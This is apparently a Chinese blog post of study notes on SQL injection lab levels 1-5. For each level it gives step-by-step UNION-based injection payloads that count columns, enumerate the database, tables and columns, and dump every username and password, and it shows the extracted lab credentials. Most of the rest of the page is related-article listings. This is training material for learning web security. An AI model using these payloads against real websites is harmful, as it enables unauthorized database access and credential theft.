2020.12.17 SQL注入

最新推荐文章于 2024-04-15 17:05:27 发布
最新推荐文章于 2024-04-15 17:05:27 发布
阅读量114 收藏
点赞数
分类专栏: SQL注入 文章标签: 安全 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45210835/article/details/112180840
版权

SQL注入1-5题

ELECT VERSION() -- mysql版本
SELECT USER() -- mysql数据库的用户名
SELECT DATABASE() -- 当前数据库

SELECT *,schema_name FROM schemata -- 当前用户拥有的所有的数据库的名字,schema_name
SELECT * FROM TABLES -- 当前用户拥有的所有数据库及其库下面的表的名字,table_schema,tablename
SELECT * FROM COLUMNS -- 当前用户拥有的所有数据库及其库下面的表的名字,及表下面的字段的名字

(1).获取所有账号密码 有引号

  1. 获取访问数据源列数
?id=1 order by 3 --+    //看是否访问出值,存在表示列数存在
sele user,pass from table where id='1' order by 3 --+ imint 0.1   //--+  将后面的imint进行一个注释
  1. 获取账号和密码所在列
?id=' union select 1,2,3  --+     // '  强行闭合放空
  1. 获取所在的库库名(爆库)
?id=' union select 1,database(),3 --+   //获取到库名security
  1. 获取所在的库下的表名,并试着寻找最有可能的表(爆表)
?id=' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+
    
    //Your Login name:emails,referers,uagents,users   找出来的表
  1. 获取表下面的列,查看是否正确
?id=' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

//Your Login name:id,username,password   拿到想要的结果,确定了表
  1. 获取所有密码和账号
?id=' union select 1,group_concat(username),group_concat(password) from users --+

Your Login name:
Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
Your Password:
Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4

//拿到所需要的账号和密码

(2).获取所有账号密码 无引号

  1. 获取访问数据源列数
?id=1 order by 3 --+    //看是否访问出值,存在表示列数存在
sele user,pass from table where id='1' order by 3 --+ imint 0.1   
//--+  将后面的imint进行一个注释    因为id为数字型,没有单引号括着
  1. 获取账号和密码所在列
?id='' union select 1,2,3  --+
//数字型放空直接两个单引号
  1. 获取所在的库库名(爆库)
?id='' union select 1,database(),3 --+   //Your Login name:security 获取到库名security
  1. 获取所在的库下的表名,并试着寻找最有可能的表(爆表)
?id='' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+
    
//Your Login name:emails,referers,uagents,users   找出来的表
  1. 获取表下面的列,查看是否正确
?id='' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

//Your Login name:id,username,password   拿到想要的结果,确定了表
  1. 获取所有密码和账号
?id='' union select 1,group_concat(username),group_concat(password) from users --+

Your Login name:
Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
Your Password:
Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4

//拿到所需要的账号和密码

(3).获取所有账号密码 存在括号和单引号

  1. 获取访问数据源列数
?id=1 order by 3 --+    //看是否访问出值,存在表示列数存在  
//--+  将后面的imint进行一个注释    因为id为数字型,所以这里不需要存在闭合
  1. 获取账号和密码所在列
?id=') union select 1,2,3  --+
//数字型放空直接两个单引号
?id='') union select 1,2,3  --+ //可以运行但是无结果,因为括号单引号和外闭合
  1. 获取所在的库库名(爆库)
?id=') union select 1,database(),3 --+   //Your Login name:security 获取到库名security
  1. 获取所在的库下的表名,并试着寻找最有可能的表(爆表)
?id=') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+
    
//Your Login name:emails,referers,uagents,users   找出来的表
  1. 获取表下面的列,查看是否正确
?id=') union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

//Your Login name:id,username,password   拿到想要的结果,确定了表
  1. 获取所有密码和账号
?id=') union select 1,group_concat(username),group_concat(password) from users --+

Your Login name:
Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
Your Password:
Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4

//拿到所需要的账号和密码

(4)获取所有账号密码 双引号与括号

  1. 获取访问数据源列数
?id=1") order by 3 --+    //看是否访问出值,存在表示列数存在  
//--+  将后面的imint进行一个注释    因为存在双引号和括号,需要对应才可以得到内容
  1. 获取账号和密码所在列
?id=") union select 1,2,3  --+
//数字型放空直接两个单引号
  1. 获取所在的库库名(爆库)
?id=") union select 1,database(),3 --+   //Your Login name:security 获取到库名security
  1. 获取所在的库下的表名,并试着寻找最有可能的表(爆表)
?id=") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+
    
//Your Login name:emails,referers,uagents,users   找出来的表
  1. 获取表下面的列,查看是否正确
?id=") union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

//Your Login name:id,username,password   拿到想要的结果,确定了表
  1. 获取所有密码和账号
?id=") union select 1,group_concat(username),group_concat(password) from users --+

Your Login name:
Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
Your Password:
Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4

//拿到所需要的账号和密码

(5)获取所有账号密码

  1. 获取访问数据源列数
?id=1") order by 3 --+    //看是否访问出值,存在表示列数存在  
//--+  将后面的imint进行一个注释    因为存在双引号和括号,需要对应才可以得到内容
  1. 获取账号和密码所在列
?id=") union select 1,2,3  --+
//数字型放空直接两个单引号
  1. 获取所在的库库名(爆库)
?id=") union select 1,database(),3 --+   //Your Login name:security 获取到库名security
  1. 获取所在的库下的表名,并试着寻找最有可能的表(爆表)
?id=") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+
    
//Your Login name:emails,referers,uagents,users   找出来的表
  1. 获取表下面的列,查看是否正确
?id=") union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

//Your Login name:id,username,password   拿到想要的结果,确定了表
  1. 获取所有密码和账号
?id=") union select 1,group_concat(username),group_concat(password) from users --+

Your Login name:
Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
Your Password:
Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4

//拿到所需要的账号和密码
syf_372
关注
专栏目录
Go实战--golang中使用图片和验证码(dchest/captcha)
一蓑烟雨任平生 也无风雨也无晴
11-07 2万+
声明不止,继续 go go go !!!昨天分享了iris框架中,如何使用Google的recaptcha。今天就一起分享学一学golang中如何使用图片验证码以及语音验证码,当然最开始我们还是要面向github编程了。使用recaptcha其实recaptcha的使用很简单,这里不使用iris框架,也很容易自己实现的。https://github.com/haisum/recaptcha/blob
go iris 加 dchest/captcha图片验证码
小月肖的肖
10-15 650
package main import ( "github.com/kataras/iris/v12" ) const ( StdWidth = 80 StdHeight = 40 ) func main() { app := iris.New() app.Get("/captcha", getCaptchaId) app.Get("/captcha/*", getCaptchaImg) app.Run(“:8080”) } func getCaptchaId(ctx *context
验证码:Go包验证码实现图像和音频验证码的生成和验证
02-04
包裹验证码 :warning: 警告:此验证码可以通过高级OCR验证码破解算法来破解。 import "github.com/dchest/captcha" 验证码套件可实现图像和音频验证码的生成和验证。 验证码解决方案是具有定义长度的数字序列0-9。 验证码有两种表示形式:图像和音频。 图像表示是经过PNG编码的图像,上面印有解决方案,使得计算机难以使用OCR对其进行求解。 音频表示形式是WAVE编码(8 kHz无符号8位)声音,带有语音解决方案(当前为英语,俄语,中文和日语)。 为了使计算机难以解决音频验证码,发音数字的声音具有随机的速度和音调,并且声音中随机混有背景噪声。 此程序包不需要外
彩虹女神跃长空,Go语言进阶之Go语言高性能Web框架Iris项目实战-登录与图形验证码(captcha)EP06
刘悦的技术博客
09-14 588
每一次captcha.NewLen(4)返回的验证码标识都是唯一的,所以也就避免了多个账号并发登录所带来的覆盖问题,同时验证码本体和其生命周期都存储在Iris服务的内存中,既灵活又方便。登录成功以后,下一步就面临用户信息留存方案的选择。该项目已开源在Github:https://github.com/zcxey2911/IrisBlog ,与君共觞,和君共勉。
(2020上半年第15天(SQL注入-注入实战(SQL注入(完结)10/10)))小迪网络安全笔记
u013630181的博客
06-29 594
案例①:实操线上靶场 案例②:实操线上靶场 案例③:实操线上靶场 参考 工具nosqlmap 工具源 案例④:实操线上靶场 参考文章
协会工会事业单位门户网站系统 v2020.12.22
12-28
宁志门户网站系统功能模块:1、站点管理站点设置/前台导航设置/首页ID调用/首页模块开关/外部调用代码/SQL防注入管理/服务器检测2、用户管理管理用户/添加用户/积分初始化/会员发稿排行榜/数据清空新/
无忧企业网站系统 v2020.12.18-ASP源码.zip
01-20
无忧企业网站系统 v2020.12.18 是一套基于ASP(Active Server Pages)技术构建的企业级网站管理平台。ASP是微软在1996年推出的一种服务器端脚本环境,它允许开发人员在HTML页面中嵌入动态生成的代码,以创建交互式的...
2020.12可用hackbar
12-13
2020年12月仍能正常使用的hackbar。Hackbar是一个Firefox的插件,它的功能类似于地址...这个Hackbar可以帮助你在测试SQL注入**,XSS漏洞和网站的安全性****,主要是帮助开发人员做代码的安全审计**,检查代码,寻找安全漏洞
2020-12-06-DVWA之sql.md
01-24
SQL Injection(SQL注入)是一种常见的Web应用程序安全漏洞,攻击者通过将恶意SQL代码插入应用程序的输入字段中,从而改变原有SQL语句的逻辑,进而获取敏感数据、修改数据或执行其他非法操作。 #### 二、DVWA介绍 ...
宁志教育培训机构版管理系统 v2020.12.22
04-21
宁志教育培训机构版管理系统 v2020.12.22 更新日志·搜索与时间移下导入下面排版 ·修复下一页代码的防SQL语句宁志教育培训机构版管理系统介绍宁志教育培训机构学校网站管理系统是一套专为学校/教育建站首选的信息...
captcha:golang验证码服务
07-09
验证码 golang验证码服务 基于 执照 麻省理工学院
2020-09-11sql注入攻击
weixin_49196285的博客
09-12 142
sql注入攻击靶机 1.随机点入一个网站后,复制IP地址后空格加–dbs,sqlmap注入跑数据库: 得到数据库: 2. (1).确定一个数据库 (2).之后按照之前的IP地址后-D 数据库 --tables,跑表 得到有关上述数据库有关的表: 3. (1).IP地址加-D数据库 -T表 --coiumns (2).得到有关表后确定表,这个表便是manager之后跑表: 得到后结果: 4.和上诉一样的操作后加入colmns一行的uid,后面加上’uid,password‘: 得到结果: 5.
[Go实战]--golang--gin中使用图片和验证码(dchest/captcha)
学生董格
05-28 9500
gin+dchest/captcha package main import ( "bytes" "fmt" "github.com/dchest/captcha" "github.com/gin-gonic/gin" "net/http" "path" "strings" "time" ) type CaptchaResponse struct { CaptchaId ...
[Go实战]--golang--gin中使用图片和验证码(dchest captcha)
最新发布
2401_84264610的博客
04-15 754
c.String(http.StatusBadRequest, “参数错误”)c.JSON(http.StatusOK, “验证成功”)c.JSON(http.StatusOK, “验证失败”)//验证码图片url。//2.获取验证码图片。
go-gin学习笔记
weixin_44164945的博客
08-30 561
go语言学习笔记
一文搞懂Go整合captcha实现验证码功能
做兴趣使然的Hero
07-15 3089
最近在使用Go语言搞一个用户登录&注册的功能,说到登录&注册相关,我们油然会产生一种增加验证码的想法,因此着手实现,后来在GitHub上找到了这个名叫captcha的插件,于是就利用文档进行了初步的学习,并融入到自己的项目中......
解决 captcha 图形验证码没有展示问题。
热门推荐
水温 。
01-21 2万+
通常情况下,动态图形验证码显示不出来了,看一下tomcat中的temp文件夹是否存在。 tomcat 中的默认文件夹temp是个存储临时文件的文件夹,若是删除了动态验证码的信息就找不到存放位置从而就展示不出来了。 (或者在项目目录下建立temp文件夹存储。【不建议】)
beego 验证码,含详细代码
mingzhehaolove的专栏
03-02 3634
beego验证码,融合github.com/dchest/captcha与beego框架 github地址  https://github.com/scloudrun/beego-captcha
Beego下如何使用captcha生成验证码
weixin_33874713的博客
05-13 1300
2019独角兽企业重金招聘Python工程师标准>>> ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值